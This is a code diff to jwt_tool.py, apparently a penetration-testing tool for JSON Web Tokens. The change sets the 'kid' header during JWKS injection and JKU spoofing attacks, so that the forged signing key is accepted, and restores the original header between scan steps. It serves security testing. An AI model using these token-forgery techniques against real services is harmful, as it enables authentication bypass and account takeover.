During JWK and JKU injection, set kid header to match JWK kid so that the key is used

jwt_tool.py

@@ -739,6 +739,7 @@ def jwksGen(headDict, paylDict, jku, privKey, kid="jwt_tool"):
     newjwks = buildJWKS(n, e, kid)
     newHead["jku"] = jku
     newHead["alg"] = "RS256"
+    newHead["kid"] = config["customising"]["jwks_kid"]
     key = RSA.importKey(privKey)
     newContents = genContents(newHead, paylDict)
     newContents = newContents.encode('UTF-8')
@@ -771,6 +772,7 @@ def jwksEmbed(newheadDict, newpaylDict):
     newjwks = buildJWKS(n, e, "jwt_tool")
     newHead["jwk"] = newjwks
     newHead["alg"] = "RS256"
+    newHead["kid"] = newjwks["kid"]
     key = privKey
     # key = RSA.importKey(privKey)
     newContents = genContents(newHead, newpaylDict)
@@ -1369,6 +1371,10 @@ def injectOut(newheadDict, newpaylDict):
 def scanModePlaybook():
     cprintc("\nLAUNCHING SCAN: JWT Attack Playbook", "magenta")
     origalg = headDict["alg"]
+    try:
+        origkid = headDict["kid"]
+    except:
+        origkid = False
     # No token
     tmpCookies = config['argvals']['cookies']
     tmpHeader = config['argvals']['header']
@@ -1418,6 +1424,10 @@ def scanModePlaybook():
     jwksig, jwksContents = jwksEmbed(headDict, paylDict)
     jwtOut(jwksContents+"."+jwksig, "Exploit: Injected JWKS (-X i)")
     headDict["alg"] = origalg
+    if origkid:
+        headDict["kid"] = origkid
+    else:
+        del headDict["kid"]
     if origjwk:
         headDict["jwk"] = origjwk
     else:
@@ -1430,6 +1440,10 @@ def scanModePlaybook():
     jku = config['services']['jwksloc']
     newContents, newSig = exportJWKS(jku)
     jwtOut(newContents+"."+newSig, "Exploit: Spoof JWKS (-X s)", "Signed with JWKS at "+config['services']['jwksloc'])
+    if origkid:
+        headDict["kid"] = origkid
+    else:
+        del headDict["kid"]
     if origjku:
         headDict["jku"] = origjku
     else: